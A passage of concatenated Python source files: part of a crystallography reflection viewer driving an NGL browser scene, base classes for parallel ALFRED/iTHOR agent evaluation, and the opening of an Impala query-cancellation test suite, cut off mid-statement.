        self.mprint("Rotation matrix determinant is less than 1")
    return rotation
def RotateAroundFracVector(self, phi, r1,r2,r3, prevrotmx = matrix.identity(3), isreciprocal=False, quietbrowser=True):
    """Rotate the scene by phi radians around the vector (r1, r2, r3).

    prevrotmx: rotation to compose with (the shared default identity is
      only ever read, never mutated, so the mutable-default pattern is
      safe here).
    isreciprocal: interpret (r1,r2,r3) as reciprocal space coordinates
      rather than real space fractional coordinates.
    quietbrowser: passed through to RotateMxStage.
    Returns (resulting rotation matrix, unit cartesian rotation axis).
    """
    if isreciprocal:
        # Assuming vector is in reciprocal space coordinates turn it into cartesian
        cartvec = list( (r1,r2,r3) * matrix.sqr(self.miller_array.unit_cell().fractionalization_matrix()).transpose() )
    else:
        # Assuming vector is in real space fractional coordinates turn it into cartesian
        cartvec = list( (r1,r2,r3) * matrix.sqr(self.miller_array.unit_cell().orthogonalization_matrix()) )
    # Rodrigues rotation formula for rotation by phi angle around a vector going through origo
    # See http://mathworld.wolfram.com/RodriguesRotationFormula.html
    # \mathbf I+\left(\sin\,\varphi\right)\mathbf W+\left(2\sin^2\frac{\varphi}{2}\right)\mathbf W^2
    normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
    ux = cartvec[0]/normR
    uy = cartvec[1]/normR
    uz = cartvec[2]/normR
    # W is the skew-symmetric cross-product matrix of the unit axis
    W = matrix.sqr([0, -uz, uy, uz, 0, -ux, -uy, ux, 0])
    I = matrix.identity(3)
    sin2phi2 = math.sin(phi/2)
    sin2phi2 *= sin2phi2
    RotMx = I + math.sin(phi)*W + 2* sin2phi2 * W*W
    self.currentRotmx = RotMx * prevrotmx # impose any other rotation already performed
    self.RotateMxStage(self.currentRotmx, quietbrowser)
    return self.currentRotmx, [ux, uy, uz]
def SpinAnimate(self, r1, r2, r3):
    """Tell the browser to spin the scene continuously about (r1, r2, r3)."""
    msg = "%s, %s, %s" %(r1, r2, r3)
    self.AddToBrowserMsgQueue("SpinAnimate", msg)
def DrawUnitCell(self, scale=1):
    """Draw the 12 edges of the real space unit cell, scaled by `scale`,
    in the browser; scale=None removes the drawn cell instead.

    The first 11 AddVector calls use name="" so their rendering is
    deferred; the final call passes name="unitcell" which joins them into
    one NGL representation (see AddVector). Removed an unused local
    `uc = self.miller_array.unit_cell()` from the original.
    """
    if scale is None:
        self.RemoveVectors("unitcell")
        self.mprint( "Removing real space unit cell", verbose=1)
        return
    rad = 0.2 # scale # * 0.05 # 1000/ uc.volume()
    # three labelled axes from the origin ...
    self.AddVector(0,0,0, scale,0,0, False, label="a", r=0.5, g=0.8, b=0.8, radius=rad)
    self.AddVector(0,0,0, 0,scale,0, False, label="b", r=0.8, g=0.5, b=0.8, radius=rad)
    self.AddVector(0,0,0, 0,0,scale, False, label="c", r=0.8, g=0.8, b=0.5, radius=rad)
    # ... and the remaining nine unlabelled edges of the cell
    self.AddVector(scale,0,0, scale,scale,0, False, r=0.8, g=0.5, b=0.8, radius=rad)
    self.AddVector(0,scale,0, scale,scale,0, False, r=0.5, g=0.8, b=0.8, radius=rad)
    self.AddVector(0,0,scale, scale,0,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
    self.AddVector(0,0,scale, 0,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
    self.AddVector(0,scale,scale, scale,scale,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
    self.AddVector(scale,0,scale, scale,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
    self.AddVector(scale,0,0, scale,0,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
    self.AddVector(0,scale,0, 0,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
    self.AddVector(scale,scale,0, scale,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad, name="unitcell")
    self.mprint( "Adding real space unit cell", verbose=1)
def DrawReciprocalUnitCell(self, scale=1):
    """Draw the 12 edges of the reciprocal unit cell, scaled by `scale`,
    in the browser; scale=None removes the drawn cell instead.

    The first 11 AddVector calls use name="" so their rendering is
    deferred; the final call passes name="reciprocal_unitcell" which joins
    them into one NGL representation (see AddVector).
    """
    if scale is None:
        self.RemoveVectors("reciprocal_unitcell")
        self.mprint( "Removing reciprocal unit cell", verbose=1)
        return
    rad = 0.2 # 0.05 * scale
    # three labelled reciprocal axes from the origin ...
    self.AddVector(0,0,0, scale,0,0, label="a*", r=0.5, g=0.3, b=0.3, radius=rad)
    self.AddVector(0,0,0, 0,scale,0, label="b*", r=0.3, g=0.5, b=0.3, radius=rad)
    self.AddVector(0,0,0, 0,0,scale, label="c*", r=0.3, g=0.3, b=0.5, radius=rad)
    # ... and the remaining nine unlabelled edges of the cell
    self.AddVector(scale,0,0, scale,scale,0, r=0.3, g=0.5, b=0.3, radius=rad)
    self.AddVector(0,scale,0, scale,scale,0, r=0.5, g=0.3, b=0.3, radius=rad)
    self.AddVector(0,0,scale, scale,0,scale, r=0.5, g=0.3, b=0.3, radius=rad)
    self.AddVector(0,0,scale, 0,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
    self.AddVector(0,scale,scale, scale,scale,scale, r=0.5, g=0.3, b=0.3, radius=rad)
    self.AddVector(scale,0,scale, scale,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
    self.AddVector(scale,0,0, scale,0,scale, r=0.3, g=0.3, b=0.5, radius=rad)
    self.AddVector(0,scale,0, 0,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad)
    self.AddVector(scale,scale,0, scale,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad, name="reciprocal_unitcell")
    self.mprint( "Adding reciprocal unit cell", verbose=1)
def GetUnitcellScales(self):
    """Compute scale factors relating the unit cell and reciprocal cell
    body diagonals to the extent of the displayed reflection data, and
    store them in self.reciproc_scale and self.realspace_scale.
    """
    spanmin, spanmax = ( self.miller_array.index_span().min(), self.miller_array.index_span().max())
    uc = self.miller_array.unit_cell()
    vec = (1.0, 1.0, 1.0)
    # uc.reciprocal_space_vector() only takes integer miller indices so compute
    # the cartesian coordinates for real valued miller indices with the transpose of the fractionalization matrix
    fracmx_t = matrix.sqr(uc.fractionalization_matrix()).transpose()  # hoisted: was built three times
    vec1 = vec * fracmx_t
    reciproc_bodydiagonal_length = vec1.length()
    reciprocspanmaxvec = spanmax * fracmx_t
    reciproc_spanmax_length = reciprocspanmaxvec.length()
    # BUGFIX: this previously multiplied spanmax again (copy-paste error),
    # so reciproc_spanmin_length always equalled reciproc_spanmax_length.
    reciprocspanminvec = spanmin * fracmx_t
    reciproc_spanmin_length = reciprocspanminvec.length()
    reciprocspan_length = max(reciproc_spanmax_length, reciproc_spanmin_length)
    self.reciproc_scale = reciprocspan_length / reciproc_bodydiagonal_length
    # for real space vector
    vec2 = vec * matrix.sqr(uc.orthogonalization_matrix())
    bodydiagonal_length = vec2.length()
    self.realspace_scale = self.scene.renderscale * reciprocspan_length / bodydiagonal_length
def fix_orientation(self, val):
    """Lock (val truthy) or unlock (val falsy) mouse rotation of the scene."""
    toggle = self.DisableMouseRotation if val else self.EnableMouseRotation
    toggle()
def clip_plane_vector(self, a, b, c, hkldist=0.0,
                      clipwidth=None, fixorientation=True, is_parallel=False, isreciprocal=False):
    """Create a clip plane oriented parallel or perpendicular to the (a, b, c)
    vector and restrict displayed reflections to a slab around it.

    A zero (a, b, c) vector or clipwidth=None removes any existing clip plane
    and its guide vector instead.
    """
    # create clip plane oriented parallel or perpendicular to abc vector
    if a==0.0 and b==0.0 and c==0.0 or clipwidth is None:
        self.RemoveVectorsNoClipPlane()
        return
    self.mprint("Applying clip plane to reflections", verbose=1)
    self.RemoveVectors("clip_vector")
    # AddVector returns the angles used to orient the new guide vector
    self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
                                                           a, b, c, isreciprocal=isreciprocal, name="clip_vector")
    if fixorientation:
        # lock the view so the clip plane stays aligned with the vector
        self.DisableMouseRotation()
    else:
        self.EnableMouseRotation()
    if is_parallel:
        self.vecrotmx = self.PointVectorParallelToClipPlane()
    else:
        self.vecrotmx = self.PointVectorPerpendicularToClipPlane()
    if self.cameraPosZ is None and self.viewmtrx is not None:
        # lazily derive camera position/rotation/translation from the last view matrix
        self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
    halfdist = self.cameraPosZ + hkldist # self.viewer.boundingZ*0.5
    if clipwidth == 0.0:
        # zero width means "just thick enough for one layer of spheres"
        clipwidth = self.meanradius
    clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
    clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
    self.SetClipPlaneDistances(clipNear, clipFar, -self.cameraPosZ)
    #if hkldist < 0.0:
    #  self.TranslateHKLpoints(a, b, c, hkldist)
    # NOTE(review): 'scale' is a local that is never used after this point -
    # looks like dead code; confirm before removing.
    scale = max(self.miller_array.index_span().max())/10
def RemoveVectorsNoClipPlane(self):
    """Remove all drawn vectors and disable clip-plane slicing, restoring
    free rotation and the original HKL point positions."""
    self.EnableMouseRotation()
    self.RemoveVectors()
    # zero near/far distances disable clipping browser-side
    self.SetClipPlaneDistances(0, 0)
    # zero-magnitude translation moves the HKL points back to the origin
    self.TranslateHKLpoints(0, 0, 0, 0.0)

def SetMouseSpeed(self, trackspeed):
    """Set the mouse trackball sensitivity in the browser."""
    msg = str(trackspeed)
    self.AddToBrowserMsgQueue("SetMouseSpeed", msg)
    #self.GetMouseSpeed() # TODO: fix wait time

def GetMouseSpeed(self):
    """Request the current mouse sensitivity from the browser.

    The reply arrives asynchronously in self.ngl_settings.mouse_sensitivity;
    this call polls for at most ~5 time units before giving up.
    """
    self.ngl_settings.mouse_sensitivity = None
    self.AddToBrowserMsgQueue("GetMouseSpeed", "")
    if self.WaitforHandshake():
        nwait = 0
        while self.ngl_settings.mouse_sensitivity is None and nwait < 5:
            #time.sleep(self.sleeptime)
            self.WBmessenger.Sleep(self.sleeptime)
            nwait += self.sleeptime

def SetClipPlaneDistances(self, near, far, cameraPosZ=None):
    """Send near/far clip-plane distances (and camera z) to the browser."""
    if cameraPosZ is None:
        # default to the currently known camera distance
        cameraPosZ = self.cameraPosZ
    msg = str(near) + ", " + str(far) + ", " + str(cameraPosZ)
    self.AddToBrowserMsgQueue("SetClipPlaneDistances", msg)
def GetClipPlaneDistances(self):
    """Ask the browser for the current near/far clip distances and camera z.

    Returns (clipNear, clipFar, cameraPosZ); values stay None if the browser
    does not answer within self.handshakewait time units.
    """
    self.clipNear = None
    self.clipFar = None
    self.cameraPosZ = None
    self.AddToBrowserMsgQueue("GetClipPlaneDistances", "")
    if self.WaitforHandshake():
        nwait = 0
        while self.clipFar is None and nwait < self.handshakewait:
            #time.sleep(self.sleeptime)
            self.WBmessenger.Sleep(self.sleeptime)
            nwait += self.sleeptime
    # NOTE(review): the bare positional 2 is presumably the verbose level
    # (sibling calls spell it verbose=2) - confirm against mprint's signature.
    self.mprint("clipnear, clipfar, cameraPosZ: %s, %s %s" \
                %(self.clipNear, self.clipFar, self.cameraPosZ), 2)
    return (self.clipNear, self.clipFar, self.cameraPosZ)

def GetBoundingBox(self):
    """Ask the browser for the bounding box of the displayed reflections.

    Returns (boundingX, boundingY, boundingZ).
    """
    self.boundingX = 0.0
    self.boundingY = 0.0
    self.boundingZ = 0.0
    self.AddToBrowserMsgQueue("GetBoundingBox", "")
    if self.WaitforHandshake():
        nwait = 0
        # NOTE(review): boundingX is initialised to 0.0 above, never None, so
        # this wait loop exits immediately. The sibling GetClipPlaneDistances
        # initialises its fields to None - confirm whether that was intended
        # here too before changing behaviour.
        while self.boundingX is None and nwait < self.handshakewait:
            #time.sleep(self.sleeptime)
            self.WBmessenger.Sleep(self.sleeptime)
            nwait += self.sleeptime
    self.mprint("boundingXYZ: %s, %s %s" \
                %(self.boundingX, self.boundingY, self.boundingZ), verbose=2)
    return (self.boundingX, self.boundingY, self.boundingZ)
def RemoveVectors(self, reprname=""):
    """Remove drawn vectors; an empty reprname removes all of them."""
    self.AddToBrowserMsgQueue("RemoveVectors", reprname )

def SetAutoView(self):
    """Reset the stage rotation to identity and let NGL auto-fit the view."""
    rotmx = self.Euler2RotMatrix( ( 0.0, 0.0, 0.0 ) )
    self.currentRotmx = rotmx
    self.RotateMxStage(rotmx)
    self.AddToBrowserMsgQueue("SetAutoView" )

def TestNewFunction(self):
    # developer hook for exercising new browser-side message handlers
    self.AddToBrowserMsgQueue("Testing")

def MakeImage(self, filename):
    """Ask the browser to render the current scene to an image file."""
    self.imagename = filename
    self.AddToBrowserMsgQueue("MakeImage")

def DisableMouseRotation(self): # disable rotating with the mouse
    self.AddToBrowserMsgQueue("DisableMouseRotation")

def EnableMouseRotation(self): # enable rotating with the mouse
    self.AddToBrowserMsgQueue("EnableMouseRotation")

def ReOrientStage(self):
    """Re-apply the last known view matrix, if any, to the browser stage."""
    if self.viewmtrx:
        self.AddToBrowserMsgQueue("SetAutoView", self.viewmtrx)
def Euler2RotMatrix(self, eulerangles):
    """Convert Euler angles to a rotation matrix.

    :param eulerangles: iterable of three Euler angles, in degrees
    :return: rotation matrix from scitbx.math.euler_angles_as_matrix
    """
    # scitbx expects radians; the pointless local aliases of the original
    # (eulerangles1, RotMx) are removed.
    radangles = [e * math.pi / 180.0 for e in eulerangles]
    return scitbx.math.euler_angles_as_matrix(radangles)
def RotateMxStage(self, rotmx, quietbrowser=True):
    """Send a stage rotation (scaled by the camera distance) to the browser.

    Does nothing until the camera distance is known.
    """
    if self.cameraPosZ is None:
        return  # no camera state yet; nothing sensible to send
    flat = (rotmx * self.cameraPosZ).as_mat3()
    cleaned = str(flat).replace("(", "").replace(")", "")
    verbosity = "quiet" if quietbrowser else "verbose"
    self.AddToBrowserMsgQueue("RotateStage", "%s, %s\n" % (cleaned, verbosity))
def TranslateHKLpoints(self, h, k, l, mag):
    """Translate the displayed HKL points by 'mag' along the cartesian
    direction of the reciprocal vector (h, k, l)."""
    # cast this reciprocal vector into cartesian before messaging NGL to translate our HKL points
    #vec = self.miller_array.unit_cell().reciprocal_space_vector((h, k, l))
    hkl_vec = flex.vec3_double( [(h,k,l)])
    rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().orthogonalization_matrix() )
    cartvec = hkl_vec * rfracmx
    if cartvec.norm()==0.0 or mag==0.0:
        # degenerate vector or zero magnitude: reset translation to the origin
        svec = (0, 0, 0)
    else:
        #cartvec = (mag/cartvec.norm()) * cartvec
        # scale to the requested magnitude in render units; negated so the
        # points move against the vector direction
        cartvec = (-mag*self.scene.renderscale/hkl_vec.norm()) * cartvec
        #svec = [cartvec[0][0]*self.scene.renderscale, cartvec[0][1]*self.scene.renderscale, cartvec[0][2]*self.scene.renderscale ]
        svec = cartvec[0]
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    self.mprint("cartesian translation vector is: " + str(roundoff(svec)), verbose=1)
    # strip the tuple parentheses so the browser gets a bare comma list
    str_vec = str(svec)
    str_vec = str_vec.replace("(", "")
    str_vec = str_vec.replace(")", "")
    msg = str_vec + "\n"
    self.AddToBrowserMsgQueue("TranslateHKLpoints", msg)
def InjectNewReflections(self, proc_array):
    """Replace the displayed reflections with a scene built from proc_array."""
    (hklscenes, scenemaxdata,
     scenemindata, scenemaxsigmas,
     sceneminsigmas, scenearrayinfos
     ) = MakeHKLscene(proc_array, 0, copy.deepcopy(self.viewerparams), { } , None)
    strdata = ""
    hklscene = hklscenes[0]
    self.scene = hklscene
    # serialise every reflection as "x,y,z,r,g,b,radius," rounded to 2 decimals
    for i,radius in enumerate(hklscene.radii):
        ftuple = (hklscene.points[i][0], hklscene.points[i][1], hklscene.points[i][2],
                  hklscene.colors[i][0], hklscene.colors[i][1], hklscene.colors[i][2], radius )
        strdata += "%s,%s,%s,%s,%s,%s,%s," % roundoff(ftuple, 2)
    strdata = strdata[:-1] # avoid the last comma
    self.isinjected = True
    self.AddToBrowserMsgQueue("InjectNewReflections", strdata)
ngl_philstr = """
mouse_sensitivity = 0.2
.type = float
bin_opacities = ""
.type = str
tooltip_alpha = 0.70
.type = float
fontsize = 9
.type = int
show_tooltips = none *click hover
.type = choice
fixorientation = False
.type = bool
camera_type = *orthographic perspective
.type = choice
"""
NGLmaster_phil = libtbx.phil.parse( ngl_philstr )
NGLparams = NGLmaster_phil.fetch().extract()
def reset_NGLsettings():
    """
    Reset NGL settings to their default values as specified in the phil
    definition string.
    """
    # BUG FIX: must rebind the module-level NGLparams. Without the 'global'
    # declaration (previously commented out) the assignment below only created
    # a function-local that was immediately discarded, making the reset a
    # silent no-op.
    global NGLparams
    NGLparams = NGLmaster_phil.fetch(source=libtbx.phil.parse(ngl_philstr)).extract()
def NGLsettings():
    """
    Get the global phil parameters object containing the NGL settings.

    Reading a module-level name needs no 'global' declaration.
    """
    #global NGLparams
    return NGLparams
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
#websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
# WS server example
import asyncio
import websockets
async def hello(websocket, path):
while True:
name = await websocket.recv()
print(f"< {name}")
greeting = f"Hello {name}!"
await websocket.send(greeting)
if name=="STOP":
return
await asyncio.sleep(0.2)
start_server = websockets.serve(hello, "localhost", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
# WS client example
import asyncio
import websockets
async def hello():
uri = "ws://localhost:8765"
async with websockets.connect(uri) as websocket:
while True:
name = input("What's your name?\n" )
await websocket.send(name)
print(f"> {name}")
greeting = await websocket.recv()
print(f"< {greeting}")
asyncio.get_event_loop().run_until_complete(hello())
"""
|
eval.py | import os
import json
import pprint
import random
import time
import torch
import torch.multiprocessing as mp
from data.preprocess import Dataset
from importlib import import_module
# import threading
class EvalMMT(object):
    """iTHOR-based interactive evaluation.

    Based on eval.py from the original Alfred repository, modified to fit the
    proposed MMT model. Work items are distributed to mp.Process workers via a
    manager-backed queue; subclasses implement run()/evaluate().
    """
    def __init__(self, args, dataset, model, detector, multiproc_manager):
        # args and manager
        self.args = args
        self.manager = multiproc_manager #run iThor env in parallel
        # Map the requested eval split name onto concrete dataset split names.
        # NOTE(review): an unrecognised eval_split leaves self.eval_splits
        # unset, which makes queue_tasks() fail with AttributeError - confirm
        # the argument is validated upstream.
        if '_' in self.args.eval_split:
            self.eval_splits = [self.args.eval_split]
        elif self.args.eval_split == 'valid':
            self.eval_splits = ['valid_seen', 'valid_unseen']
        elif self.args.eval_split == 'test':
            self.eval_splits = ['tests_seen', 'tests_unseen']
        # setup Alfred dataset and get vocabularies
        self.dataset = dataset
        self.pp_path = dataset.pp_path
        self.vocabs = {}
        self.vocabs['in_vocab_action'] = self.dataset.dec_in_vocab
        self.vocabs['out_vocab_high_type'] = self.dataset.dec_out_vocab_high
        self.vocabs['out_vocab_low_type'] = self.dataset.dec_out_vocab_low
        self.vocabs['out_vocab_arg'] = self.dataset.dec_out_vocab_arg
        # setup the model(s) to be evaluated; share_memory() lets the child
        # processes spawned in spawn_threads() reuse the same tensors
        self.model = model
        if isinstance(model, dict):
            for m in model.values():
                m.share_memory()
                m.eval()
        else:
            self.model.share_memory()
            self.model.eval()
        # setup the object detector
        self.detector = detector
        self.detector.share_memory()
        self.detector.eval()
        # prepare the task directories for evaluation
        self.queue_tasks()

    def queue_tasks(self):
        """Fill a shared queue with (task_path, repeat_idx) work items."""
        # manager-backed dicts shared across worker processes
        self.stats = self.manager.dict()
        self.results = self.manager.dict()
        # queue tasks
        self.task_queue = self.manager.Queue()
        for split in self.eval_splits:
            # random.shuffle(self.dataset.dataset_splits[split])
            for task in self.dataset.dataset_splits[split]:
                task_path = os.path.join(self.pp_path, split, task['task'])
                self.task_queue.put((task_path, task['repeat_idx']))
                if self.args.fast_epoch and self.task_queue.qsize() == 3:
                    break
            else:
                # inner loop finished without break: move on to the next split
                continue
            # inner loop broke (fast_epoch cap reached): stop queueing entirely
            break
        self.stats['task_num'] = self.task_queue.qsize()
        print('Total task num:', self.task_queue.qsize())

    def spawn_threads(self):
        '''
        Spawn multiple workers to run eval in parallel. Despite the name these
        are mp.Process workers, not threads.
        '''
        self.stats['start_time'] = time.time()
        # start threads
        threads = []
        lock = self.manager.Lock()
        for n in range(self.args.num_threads):
            # NOTE(review): the worker index n is passed as the first positional
            # argument, but the abstract run() stub below does not declare it -
            # presumably subclasses accept it; confirm.
            thread = mp.Process(target=self.run, args=(n, self.model, self.detector,
                self.vocabs, self.task_queue, self.args, lock, self.stats, self.results))
            thread.start()
            threads.append(thread)
        # wait for all workers to drain the queue
        for t in threads:
            t.join()
        # self.save_results()

    @classmethod
    def setup_scene(cls, env, traj_data, args, reward_type='dense'):
        '''
        Initialize the scene and agent from the task info.
        '''
        # scene setup
        scene_num = traj_data['scene']['scene_num']
        object_poses = traj_data['scene']['object_poses']
        dirty_and_empty = traj_data['scene']['dirty_and_empty']
        object_toggles = traj_data['scene']['object_toggles']
        scene_name = 'FloorPlan%d' % scene_num
        env.reset(scene_name)
        env.restore_scene(object_poses, object_toggles, dirty_and_empty)
        # initialize to start position
        env.step(dict(traj_data['scene']['init_action']))
        # setup task for reward
        env.set_task(traj_data, args, reward_type=reward_type)

    @classmethod
    def run(cls, model, detector, vocabs, task_queue, args, lock, stats, results):
        # abstract: per-worker loop draining task_queue (see spawn_threads)
        raise NotImplementedError()

    @classmethod
    def evaluate(cls, env, model, detector, vocabs, traj_data, args, lock, stats, results):
        # abstract: evaluate a single trajectory in the given environment
        raise NotImplementedError()

    def save_results(self):
        # abstract: persist self.results after evaluation
        raise NotImplementedError()

    def create_stats(self):
        # abstract: initialise success/failure bookkeeping
        raise NotImplementedError()

    def start(self):
        # abstract: entry point driving the whole evaluation
        raise NotImplementedError()
class Eval(object):
    """Base class for ALFRED-style interactive evaluation.

    Loads a trained model (and ResNet feature extractor), queues trajectories,
    and fans evaluation out over mp.Process workers. Subclasses implement
    run()/evaluate()/save_results()/create_stats().
    """
    # tokens marking the end of predicted action (sub)sequences
    STOP_TOKEN = "<<stop>>"
    SEQ_TOKEN = "<<seg>>"
    TERMINAL_TOKENS = [STOP_TOKEN, SEQ_TOKEN]

    def __init__(self, args, manager):
        # args and manager
        self.args = args
        self.manager = manager
        # load splits
        with open(self.args.splits) as f:
            self.splits = json.load(f)
            pprint.pprint({k: len(v) for k, v in self.splits.items()})
        # load model dynamically from the module named in args.model
        print("Loading: ", self.args.model_path)
        M = import_module(self.args.model)
        self.model, optimizer = M.Module.load(self.args.model_path, self.args)
        self.model.share_memory()
        self.model.eval()
        self.model.test_mode = True
        # updated args: write outputs next to the loaded checkpoint
        self.model.args.dout = self.args.model_path.replace(self.args.model_path.split('/')[-1], '')
        self.model.args.data = self.args.data if self.args.data else self.model.args.data
        # preprocess and save
        if args.preprocess:
            print("\nPreprocessing dataset and saving to %s folders ... This is will take a while. Do this once as required:" % self.model.args.pp_folder)
            self.model.args.fast_epoch = self.args.fast_epoch
            dataset = Dataset(self.model.args, self.model.vocab)
            dataset.preprocess_splits(self.splits)
        # load resnet
        # NOTE(review): Resnet is not imported in this module's visible import
        # block - confirm it is injected elsewhere, otherwise this line raises
        # NameError at runtime.
        args.visual_model = 'resnet18'
        self.resnet = Resnet(args, eval=True, share_memory=True, use_conv_feat=True)
        # gpu
        if self.args.gpu:
            self.model = self.model.to(torch.device('cuda'))
        # success and failure lists
        self.create_stats()
        # set random seed for shuffling
        random.seed(int(time.time()))

    def queue_tasks(self):
        '''
        Create queue of trajectories to be evaluated.
        '''
        task_queue = self.manager.Queue()
        files = self.splits[self.args.eval_split]
        # debugging: fast epoch
        if self.args.fast_epoch:
            files = files[:16]
        if self.args.shuffle:
            random.shuffle(files)
        for traj in files:
            task_queue.put(traj)
        return task_queue

    def spawn_threads(self):
        '''
        Spawn multiple workers to run eval in parallel (mp.Process, despite
        the method name).
        '''
        task_queue = self.queue_tasks()
        # start threads
        threads = []
        lock = self.manager.Lock()
        for n in range(self.args.num_threads):
            thread = mp.Process(target=self.run, args=(self.model, self.resnet, task_queue, self.args, lock,
                                                       self.successes, self.failures, self.results))
            thread.start()
            threads.append(thread)
        for t in threads:
            t.join()

        # lock = threading.Lock()
        # for n in range(self.args.num_threads):
        #     thread = threading.Thread(target=self.run, args=(self.model, self.resnet, task_queue, self.args, lock, self.successes, self.failures, self.results))
        #     threads.append(thread)
        #     thread.start()
        #     time.sleep(1)

        # save
        self.save_results()

    @classmethod
    def setup_scene(cls, env, traj_data, r_idx, args, reward_type='dense'):
        '''
        Initialize the scene and agent from the task info.
        '''
        # scene setup
        scene_num = traj_data['scene']['scene_num']
        object_poses = traj_data['scene']['object_poses']
        dirty_and_empty = traj_data['scene']['dirty_and_empty']
        object_toggles = traj_data['scene']['object_toggles']
        scene_name = 'FloorPlan%d' % scene_num
        env.reset(scene_name)
        env.restore_scene(object_poses, object_toggles, dirty_and_empty)
        # initialize to start position
        env.step(dict(traj_data['scene']['init_action']))
        # print goal instr
        print("Task: %s" % (traj_data['turk_annotations']['anns'][r_idx]['task_desc']))
        # setup task for reward
        env.set_task(traj_data, args, reward_type=reward_type)

    @classmethod
    def run(cls, model, resnet, task_queue, args, lock, successes, failures):
        # abstract: per-worker loop draining task_queue.
        # NOTE(review): spawn_threads() also passes 'results' as a final
        # argument not declared here - subclasses presumably accept it; confirm.
        raise NotImplementedError()

    @classmethod
    def evaluate(cls, env, model, r_idx, resnet, traj_data, args, lock, successes, failures):
        # abstract: evaluate a single trajectory
        raise NotImplementedError()

    def save_results(self):
        # abstract: persist successes/failures/results
        raise NotImplementedError()

    def create_stats(self):
        # abstract: initialise successes/failures/results containers
        raise NotImplementedError()
|
test_cancellation.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests query cancellation using the ImpalaService.Cancel API
#
import pytest
import threading
from time import sleep
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.test_vector import ImpalaTestDimension
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.verifiers.metric_verifier import MetricVerifier
# PRIMARY KEY for lineitem
LINEITEM_PK = 'l_orderkey, l_partkey, l_suppkey, l_linenumber'
# Queries to execute, mapped to a unique PRIMARY KEY for use in CTAS with Kudu. If None
# is specified for the PRIMARY KEY, it will not be used in a CTAS statement on Kudu.
# Use the TPC-H dataset because tables are large so queries take some time to execute.
QUERIES = {'select l_returnflag from lineitem' : None,
'select count(l_returnflag) pk from lineitem' : 'pk',
'select * from lineitem limit 50' : LINEITEM_PK,
'compute stats lineitem' : None,
'select * from lineitem order by l_orderkey' : LINEITEM_PK}
QUERY_TYPE = ["SELECT", "CTAS"]
# Time to sleep between issuing query and canceling. Favor small times since races
# are prone to occur more often when the time between RPCs is small.
CANCEL_DELAY_IN_SECONDS = [0, 0.01, 0.1, 1, 4]
# Number of times to execute/cancel each query under test
NUM_CANCELATION_ITERATIONS = 1
# Test cancellation on both running and hung queries. Node ID 0 is the scan node
WAIT_ACTIONS = [None, '0:GETNEXT:WAIT']
# Verify that failed CancelFInstances() RPCs don't lead to hung queries
FAIL_RPC_ACTIONS = [None, 'COORD_CANCEL_QUERY_FINSTANCES_RPC:FAIL']
# Test cancelling when there is a resource limit.
CPU_LIMIT_S = [0, 100000]
# Verify close rpc running concurrently with fetch rpc. The two cases verify:
# False: close and fetch rpc run concurrently.
# True: cancel rpc is enough to ensure that the fetch rpc is unblocked.
JOIN_BEFORE_CLOSE = [False, True]
# Extra dimensions to test order by without limit
SORT_QUERY = 'select * from lineitem order by l_orderkey'
SORT_CANCEL_DELAY = range(6, 10)
SORT_BUFFER_POOL_LIMIT = ['0', '300m'] # Test spilling and non-spilling sorts.
class TestCancellation(ImpalaTestSuite):
    """Tests query cancellation using the ImpalaService.Cancel API.

    Each test vector starts a (possibly CTAS-wrapped) query, fetches results
    from a helper thread, cancels the query after 'cancel_delay' seconds and
    verifies that the cancel/fetch/close RPC outcomes are mutually consistent.
    """

    @classmethod
    def get_workload(self):
        # TPC-H: tables are large enough that queries run long enough to cancel.
        return 'tpch'

    @classmethod
    def add_test_dimensions(cls):
        """Build the matrix of query x cancel-timing x debug-action combos."""
        super(TestCancellation, cls).add_test_dimensions()
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('query', *QUERIES.keys()))
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('query_type', *QUERY_TYPE))
        cls.ImpalaTestMatrix.add_dimension(
